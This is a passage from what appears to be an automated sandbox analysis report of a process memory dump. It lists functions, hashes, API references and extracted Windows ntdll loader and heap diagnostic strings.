                                                                                  • Instruction ID: 8e501b71c5e3c54ee151989a67f9709c1142d50669a8497be3cda63ed2b212e3
                                                                                  • Opcode Fuzzy Hash: 1d9f2867c6562e32d1f2ed2233ac2ef1fb1a165fc89a58d93122af4896114f78
                                                                                  • Instruction Fuzzy Hash: 39E06D716042047BC614EE59EC41E9B77ACEFC8710F00441AFA18A7242D670B9108BB9
                                                                                  Function 0042CA33 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 125 42ca33-42ca6f call 404a33 call 42d8c3 ExitProcess
                                                                                  APIs
                                                                                  • ExitProcess.KERNEL32(?,00000000,00000000,?,FBF4E0C3,?,?,FBF4E0C3), ref: 0042CA6A
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2074798692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_400000_csc.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ExitProcess
                                                                                  • String ID:
                                                                                  • API String ID: 621844428-0
                                                                                  • Opcode ID: fad0052eb9bca92c5d2911e37fb90033c30c84320f1b66b6f82743aff0afe31f
                                                                                  • Instruction ID: ac58fccdbd163d129240ee67b65ec416428b6f97e0c066e93c009288e506961d
                                                                                  • Opcode Fuzzy Hash: fad0052eb9bca92c5d2911e37fb90033c30c84320f1b66b6f82743aff0afe31f
                                                                                  • Instruction Fuzzy Hash: E9E04F767403147BD610FA5ADC42F9B775CDFC5714F00441AFA4867241C6B079058BF5
                                                                                  Function 05782C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 130 5782c0a-5782c0f 131 5782c1f-5782c26 LdrInitializeThunk 130->131 132 5782c11-5782c18 130->132
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2075036679.0000000005710000.00000040.00001000.00020000.00000000.sdmp, Offset: 05710000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5710000_csc.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: 26f9c4bd970f2d39e7d75b60c69afa92ad806c660402b99209173e247ae5fece
                                                                                  • Instruction ID: e684e434b2ee236d1cba81543d490cf82e43e7e350cfb6f2be12035bd91447e8
                                                                                  • Opcode Fuzzy Hash: 26f9c4bd970f2d39e7d75b60c69afa92ad806c660402b99209173e247ae5fece
                                                                                  • Instruction Fuzzy Hash: 7FB04C729415C585DA15A7605608A267911A791701F55C061D2024655A47288191F176

                                                                                  Non-executed Functions

                                                                                  Function 057F8D10 Relevance: 37.8, Strings: 30, Instructions: 268COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  • The instruction at %p tried to %s , xrefs: 057F8F66
                                                                                  • This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 057F8F2D
                                                                                  • read from, xrefs: 057F8F5D, 057F8F62
                                                                                  • This failed because of error %Ix., xrefs: 057F8EF6
                                                                                  • *** enter .cxr %p for the context, xrefs: 057F8FBD
                                                                                  • The resource is owned shared by %d threads, xrefs: 057F8E2E
                                                                                  • The instruction at %p referenced memory at %p., xrefs: 057F8EE2
                                                                                  • *** then kb to get the faulting stack, xrefs: 057F8FCC
                                                                                  • write to, xrefs: 057F8F56
                                                                                  • The resource is owned exclusively by thread %p, xrefs: 057F8E24
                                                                                  • If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 057F8DC4
                                                                                  • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 057F8FEF
                                                                                  • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 057F8DB5
                                                                                  • *** Resource timeout (%p) in %ws:%s, xrefs: 057F8E02
                                                                                  • *** Critical Section Timeout (%p) in %ws:%s, xrefs: 057F8E4B
                                                                                  • Go determine why that thread has not released the critical section., xrefs: 057F8E75
                                                                                  • <unknown>, xrefs: 057F8D2E, 057F8D81, 057F8E00, 057F8E49, 057F8EC7, 057F8F3E
                                                                                  • The critical section is owned by thread %p., xrefs: 057F8E69
                                                                                  • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 057F8DD3
                                                                                  • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 057F8E86
                                                                                  • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 057F8E3F
                                                                                  • This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 057F8F34
                                                                                  • *** enter .exr %p for the exception record, xrefs: 057F8FA1
                                                                                  • *** An Access Violation occurred in %ws:%s, xrefs: 057F8F3F
                                                                                  • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 057F8D8C
                                                                                  • *** A stack buffer overrun occurred in %ws:%s, xrefs: 057F8DA3
                                                                                  • This means that the I/O device reported an I/O error. Check your hardware., xrefs: 057F8F26
                                                                                  • an invalid address, %p, xrefs: 057F8F7F
                                                                                  • *** Inpage error in %ws:%s, xrefs: 057F8EC8
                                                                                  • a NULL pointer, xrefs: 057F8F90
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2075036679.0000000005710000.00000040.00001000.00020000.00000000.sdmp, Offset: 05710000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5710000_csc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
                                                                                  • API String ID: 0-108210295
                                                                                  • Opcode ID: 287633ca5a138181f60d5c69f3a017ca41c7b9198e661258f3e43f5a22ae34e0
                                                                                  • Instruction ID: 4c0477c527ec500b33844124f5afe254d4aa0b8759645e9716dd8b25ddd83ae8
                                                                                  • Opcode Fuzzy Hash: 287633ca5a138181f60d5c69f3a017ca41c7b9198e661258f3e43f5a22ae34e0
                                                                                  • Instruction Fuzzy Hash: 9181BFB9A44210BFCB25DB14CC4EE6A7F76EF56B20F050088F2096F253E2768551FB62
                                                                                  Function 057C2349 Relevance: 26.1, Strings: 20, Instructions: 1117COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2075036679.0000000005710000.00000040.00001000.00020000.00000000.sdmp, Offset: 05710000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5710000_csc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                                                  • API String ID: 0-2160512332
                                                                                  • Opcode ID: dc7ee4db4c4f326d3ba0a1747ef2a865fd1a9d988508f007a971fb4cacc4f122
                                                                                  • Instruction ID: 748b156e366c2875ba310a7d42db09117d60f869ce21b83882974ae47bb8fee0
                                                                                  • Opcode Fuzzy Hash: dc7ee4db4c4f326d3ba0a1747ef2a865fd1a9d988508f007a971fb4cacc4f122
                                                                                  • Instruction Fuzzy Hash: 8C929979608341AFD721DF24C888F6ABBE9BB84710F044C6DFA95D7252D770E844EB92
                                                                                  Function 05778620 Relevance: 17.7, Strings: 14, Instructions: 223COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 057B540A, 057B5496, 057B5519
                                                                                  • double initialized or corrupted critical section, xrefs: 057B5508
                                                                                  • Critical section address., xrefs: 057B5502
                                                                                  • 8, xrefs: 057B52E3
                                                                                  • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 057B54E2
                                                                                  • Thread is in a state in which it cannot own a critical section, xrefs: 057B5543
                                                                                  • Invalid debug info address of this critical section, xrefs: 057B54B6
                                                                                  • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 057B54CE
                                                                                  • corrupted critical section, xrefs: 057B54C2
                                                                                  • Address of the debug info found in the active list., xrefs: 057B54AE, 057B54FA
                                                                                  • Thread identifier, xrefs: 057B553A
                                                                                  • Critical section address, xrefs: 057B5425, 057B54BC, 057B5534
                                                                                  • undeleted critical section in freed memory, xrefs: 057B542B
                                                                                  • Critical section debug info address, xrefs: 057B541F, 057B552E
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2075036679.0000000005710000.00000040.00001000.00020000.00000000.sdmp, Offset: 05710000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5710000_csc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                                                  • API String ID: 0-2368682639
                                                                                  • Opcode ID: 3fba126bcd930d8ecbbc940057d9fdb07601d9d6bacea5ff90f629d8d93f62ce
                                                                                  • Instruction ID: ae38be7388772caf17b26fd7b4f7323f3226da54b1a2534e122e69e5498c9778
                                                                                  • Opcode Fuzzy Hash: 3fba126bcd930d8ecbbc940057d9fdb07601d9d6bacea5ff90f629d8d93f62ce
                                                                                  • Instruction Fuzzy Hash: ED817DB1A40368EFEB20CF95D849FAEBBB6BB08714F104119F905B7241D3B5A941EB51
                                                                                  Function 0575AD00 Relevance: 11.8, Strings: 9, Instructions: 509COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2075036679.0000000005710000.00000040.00001000.00020000.00000000.sdmp, Offset: 05710000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5710000_csc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: DLL name: %wZ$DLL search path passed in externally: %ws$LdrGetDllHandleEx$LdrpFindLoadedDllInternal$LdrpInitializeDllPath$Status: 0x%08lx$minkernel\ntdll\ldrapi.c$minkernel\ntdll\ldrfind.c$minkernel\ntdll\ldrutil.c
                                                                                  • API String ID: 0-3197712848
                                                                                  • Opcode ID: 0d1a8c4a359564d976972a9cd0b00f0729334a26840bddb5482ad3c48312b2de
                                                                                  • Instruction ID: 260437a2f176c96baa201175cd016780ba9842f0f160a8934458220dca9200a2
                                                                                  • Opcode Fuzzy Hash: 0d1a8c4a359564d976972a9cd0b00f0729334a26840bddb5482ad3c48312b2de
                                                                                  • Instruction Fuzzy Hash: A912F5B1A083419BD725DF18C445BBAB7E5BF84724F040A2DFC8A8B291E7B4D944E792
                                                                                  Function 057F0CB5 Relevance: 10.4, Strings: 8, Instructions: 402COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2075036679.0000000005710000.00000040.00001000.00020000.00000000.sdmp, Offset: 05710000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5710000_csc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: HEAP: $HEAP[%wZ]: $Non-Dedicated free list element %p is out of order$Number of free blocks in arena (%ld) does not match number in the free lists (%ld)$Pseudo Tag %04x size incorrect (%Ix != %Ix) %p$Tag %04x (%ws) size incorrect (%Ix != %Ix) %p$Total size of free blocks in arena (%Id) does not match number total in heap header (%Id)$dedicated (%04Ix) free list element %p is marked busy
                                                                                  • API String ID: 0-1357697941
                                                                                  • Opcode ID: 03e37fc00ebd2f4b3fc399a6b7a6b5e228a1a78f55046658ed360655a7a1b951
                                                                                  • Instruction ID: 3d30651b99c1515060b423aa650bf30250cb7adaf9f23a67743c1417c7d4fc2a
                                                                                  • Opcode Fuzzy Hash: 03e37fc00ebd2f4b3fc399a6b7a6b5e228a1a78f55046658ed360655a7a1b951
                                                                                  • Instruction Fuzzy Hash: 7FF11371A04685EFCB25DF68C089BBABBF5FF09310F448059EA869B342D730E945EB50
                                                                                  Function 057F0274 Relevance: 10.3, Strings: 8, Instructions: 348COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2075036679.0000000005710000.00000040.00001000.00020000.00000000.sdmp, Offset: 05710000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5710000_csc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                                                  • API String ID: 0-1700792311
                                                                                  • Opcode ID: cdd9f00eeef28ce940f20710f0bd1a2e6fbe9a0aa59f1f011bdadd10041503fe
                                                                                  • Instruction ID: 6ad9e9ba70a95be70bef3b03e164fa1e302746191fa63ee3cb768ae4feb1553a
                                                                                  • Opcode Fuzzy Hash: cdd9f00eeef28ce940f20710f0bd1a2e6fbe9a0aa59f1f011bdadd10041503fe
                                                                                  • Instruction Fuzzy Hash: 75D1EC71614684DFCB26DF68C44EAA9BBF2FF4A710F088449E9469B313D734E940EB14
                                                                                  Function 0574ADE0 Relevance: 9.3, Strings: 7, Instructions: 573COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2075036679.0000000005710000.00000040.00001000.00020000.00000000.sdmp, Offset: 05710000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5710000_csc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: #$H$J$LdrpResSearchResourceMappedFile Enter$LdrpResSearchResourceMappedFile Exit$MUI$MZER
                                                                                  • API String ID: 0-664215390
                                                                                  • Opcode ID: 67cf87ba9bc9888b1c5312d90ae765a917313a9afe096af4e03b73075ddd9e26
                                                                                  • Instruction ID: 104dfb6ad198faf505113aa62477418daa5743bb7217d28343c5694b118d6c55
                                                                                  • Opcode Fuzzy Hash: 67cf87ba9bc9888b1c5312d90ae765a917313a9afe096af4e03b73075ddd9e26
                                                                                  • Instruction Fuzzy Hash: 32328F71A442698BDF22CF14C898BFEB7B6BF85340F1441EAE84DA7250D7759E81AF40
                                                                                  Function 05772F98 Relevance: 9.1, Strings: 7, Instructions: 307COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 057B292E
                                                                                  • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 057B28B2
                                                                                  • SXS: Assembly storage resolution failing probe because attempt to allocate %u bytes failed., xrefs: 057B2881
                                                                                  • SXS: %s() bad parametersSXS: Flags: 0x%lxSXS: Root: %pSXS: AssemblyDirectory: %pSXS: PreAllocatedString: %pSXS: DynamicString: %pSXS: StringUsed: %pSXS: OpenDirectoryHandle: %p, xrefs: 057B29B1
                                                                                  • @, xrefs: 05773180
                                                                                  • SXS: Assembly storage resolution failing probe because combined path length does not fit in an UNICODE_STRING., xrefs: 057B2856
                                                                                  • RtlpProbeAssemblyStorageRootForAssembly, xrefs: 057B29AC
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2075036679.0000000005710000.00000040.00001000.00020000.00000000.sdmp, Offset: 05710000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5710000_csc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: @$RtlpProbeAssemblyStorageRootForAssembly$SXS: %s() bad parametersSXS: Flags: 0x%lxSXS: Root: %pSXS: AssemblyDirectory: %pSXS: PreAllocatedString: %pSXS: DynamicString: %pSXS: StringUsed: %pSXS: OpenDirectoryHandle: %p$SXS: Assembly storage resolution failing probe because attempt to allocate %u bytes failed.$SXS: Assembly storage resolution failing probe because combined path length does not fit in an UNICODE_STRING.$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx
                                                                                  • API String ID: 0-541586583
                                                                                  • Opcode ID: 5382eefa7d824222c993a608b911c31ff5a5157b7dfdbceaba2a9fcfe9cfb98c
                                                                                  • Instruction ID: 662ca69054d0ebd6c828fd996f55572d1e1c2b3fee3c981c66fb56c60863574c
                                                                                  • Opcode Fuzzy Hash: 5382eefa7d824222c993a608b911c31ff5a5157b7dfdbceaba2a9fcfe9cfb98c
                                                                                  • Instruction Fuzzy Hash: E6C1CD75A012289BEB309F55DC88BBAB7B5FF44710F1040E9E84DAB251E7709E80EF61
                                                                                  Function 057C4DD7 Relevance: 8.8, Strings: 7, Instructions: 86COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  • minkernel\ntdll\ldrutil.c, xrefs: 057C4E06
                                                                                  • Break repeatedly, break Once, Ignore, terminate Process or terminate Thread (boipt)? , xrefs: 057C4E38
                                                                                  • Function %s raised exception 0x%08lxException record: .exr %pContext record: .cxr %p, xrefs: 057C4DF5
                                                                                  • LdrpProtectedCopyMemory, xrefs: 057C4DF4
                                                                                  • LdrpGenericExceptionFilter, xrefs: 057C4DFC
                                                                                  • Execute '.cxr %p' to dump context, xrefs: 057C4EB1
                                                                                  • ***Exception thrown within loader***, xrefs: 057C4E27
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2075036679.0000000005710000.00000040.00001000.00020000.00000000.sdmp, Offset: 05710000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5710000_csc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: ***Exception thrown within loader***$Break repeatedly, break Once, Ignore, terminate Process or terminate Thread (boipt)? $Execute '.cxr %p' to dump context$Function %s raised exception 0x%08lxException record: .exr %pContext record: .cxr %p$LdrpGenericExceptionFilter$LdrpProtectedCopyMemory$minkernel\ntdll\ldrutil.c
                                                                                  • API String ID: 0-2973941816
                                                                                  • Opcode ID: c5b7bd428e35dcce346712b398014974d92fc6a003d1bc971752c209c928b88d
                                                                                  • Instruction ID: b000540c1e328a7c7d4ff9f903a9fcb94c88209cc2c68256788e5361af4ec97e
                                                                                  • Opcode Fuzzy Hash: c5b7bd428e35dcce346712b398014974d92fc6a003d1bc971752c209c928b88d
                                                                                  • Instruction Fuzzy Hash: F1218EB3284150BBDF289A6C8C5EE367FAFFB43B61F15059CF41296541C960DD00F261
                                                                                  Function 057763FF Relevance: 7.8, Strings: 6, Instructions: 261COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2075036679.0000000005710000.00000040.00001000.00020000.00000000.sdmp, Offset: 05710000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5710000_csc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                                                  • API String ID: 0-792281065
                                                                                  • Opcode ID: 62519b1293639e47d9fe23f0dfb392113e4e601f0ffc6195a7573bfbd2dfffcb
                                                                                  • Instruction ID: c786dcb4f13dc3f0c9fcbc1da5b12f3a602ea865b009ae8b4a74b4713393cd0d
                                                                                  • Opcode Fuzzy Hash: 62519b1293639e47d9fe23f0dfb392113e4e601f0ffc6195a7573bfbd2dfffcb
                                                                                  • Instruction Fuzzy Hash: C4911670B097189BEF25DF54E84DFFA3BA3BB41B14F000528E9026B686DBB49901F791
                                                                                  Function 05772CF0 Relevance: 7.7, Strings: 6, Instructions: 218COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  • SXS: Attempt to get storage location from subkey %wZ failed; Status = 0x%08lx, xrefs: 057B276F
                                                                                  • \WinSxS\, xrefs: 05772E23
                                                                                  • SXS: Unable to open registry key %wZ Status = 0x%08lx, xrefs: 057B279C
                                                                                  • .Local\, xrefs: 05772D91
                                                                                  • SXS: Unable to enumerate assembly storage subkey #%lu Status = 0x%08lx, xrefs: 057B2706
                                                                                  • @, xrefs: 05772E4D
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2075036679.0000000005710000.00000040.00001000.00020000.00000000.sdmp, Offset: 05710000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5710000_csc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: .Local\$@$SXS: Attempt to get storage location from subkey %wZ failed; Status = 0x%08lx$SXS: Unable to enumerate assembly storage subkey #%lu Status = 0x%08lx$SXS: Unable to open registry key %wZ Status = 0x%08lx$\WinSxS\
                                                                                  • API String ID: 0-3926108909
                                                                                  • Opcode ID: 863b78a2ac003bbefec6dc85774860eaa23a598476c6172e37ccc67e5a8bd82d
                                                                                  • Instruction ID: 7d72e0f493ef36aefecef71cb64c4de602b40ed3a12fbbbbe72d09f526a9d816
                                                                                  • Opcode Fuzzy Hash: 863b78a2ac003bbefec6dc85774860eaa23a598476c6172e37ccc67e5a8bd82d
                                                                                  • Instruction Fuzzy Hash: F981F0756083519FDB11CF14C488AABB7E5FF86704F44885DF895CB242D7B0D640EBA2
                                                                                  Function 0573645D Relevance: 7.6, Strings: 6, Instructions: 150COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 05799A11, 05799A3A
                                                                                  • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 05799A2A
                                                                                  • apphelp.dll, xrefs: 05736496
                                                                                  • Getting the shim engine exports failed with status 0x%08lx, xrefs: 05799A01
                                                                                  • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 057999ED
                                                                                  • LdrpInitShimEngine, xrefs: 057999F4, 05799A07, 05799A30
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2075036679.0000000005710000.00000040.00001000.00020000.00000000.sdmp, Offset: 05710000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5710000_csc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                  • API String ID: 0-204845295
                                                                                  • Opcode ID: 1df5aa809c311ba281684853eab238e6361315d5330c7cfb932e25b479b3b212
                                                                                  • Instruction ID: 05c60fe4d34bed27c771e9a38726dd65b9ce2dc02516e907d8c1685f8b15ffe8
                                                                                  • Opcode Fuzzy Hash: 1df5aa809c311ba281684853eab238e6361315d5330c7cfb932e25b479b3b212
                                                                                  • Instruction Fuzzy Hash: EC51B471218304AFE725DF24D84ABAB7BE9FB84754F00092DF98597161DB70E904EBA3
                                                                                  Function 05772674 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  • SXS: %s() passed the empty activation context, xrefs: 057B2165
                                                                                  • RtlGetAssemblyStorageRoot, xrefs: 057B2160, 057B219A, 057B21BA
                                                                                  • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 057B219F
                                                                                  • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 057B21BF
                                                                                  • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 057B2180
                                                                                  • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 057B2178
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2075036679.0000000005710000.00000040.00001000.00020000.00000000.sdmp, Offset: 05710000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5710000_csc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                                                  • API String ID: 0-861424205
                                                                                  • Opcode ID: 36b9207416bd5af6aab05270d4fe026deaf13fa292a7a0398309b13a321eba4e
                                                                                  • Instruction ID: 554cf98a92b2ef6cbe0f7bf652b9d3c797e40cc6ca3d86b7c89a849321cfda85
                                                                                  • Opcode Fuzzy Hash: 36b9207416bd5af6aab05270d4fe026deaf13fa292a7a0398309b13a321eba4e
                                                                                  • Instruction Fuzzy Hash: 35313B7AB012287BFB11CA549D49F9E7B79EB54B50F050099FA05AB102D270AE01F6E0
                                                                                  Function 0577C6A6 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  • LdrpInitializeImportRedirection, xrefs: 057B8177, 057B81EB
                                                                                  • LdrpInitializeProcess, xrefs: 0577C6C4
                                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 0577C6C3
                                                                                  • minkernel\ntdll\ldrredirect.c, xrefs: 057B8181, 057B81F5
                                                                                  • Loading import redirection DLL: '%wZ', xrefs: 057B8170
                                                                                  • Unable to build import redirection Table, Status = 0x%x, xrefs: 057B81E5
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2075036679.0000000005710000.00000040.00001000.00020000.00000000.sdmp, Offset: 05710000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5710000_csc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                                                  • API String ID: 0-475462383
                                                                                  • Opcode ID: 4657431b0cf4a0942503d089e07b2e465819b1f52cae110093aa9b9f36195f2e
                                                                                  • Instruction ID: ef085f6c04a54c8808a87a6081c00c330301f29f1b7e79d10cf8b2c8eab4fd9f
                                                                                  • Opcode Fuzzy Hash: 4657431b0cf4a0942503d089e07b2e465819b1f52cae110093aa9b9f36195f2e
                                                                                  • Instruction Fuzzy Hash: C431F7B1748345ABD714EF29DC4EE6A7799EF84B10F00095CFC45AB291EA60EC04E7A2
                                                                                  Function 0578096E Relevance: 6.6, APIs: 4, Instructions: 606COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 05782DF0: LdrInitializeThunk.NTDLL ref: 05782DFA
                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 05780BA3
                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 05780BB6
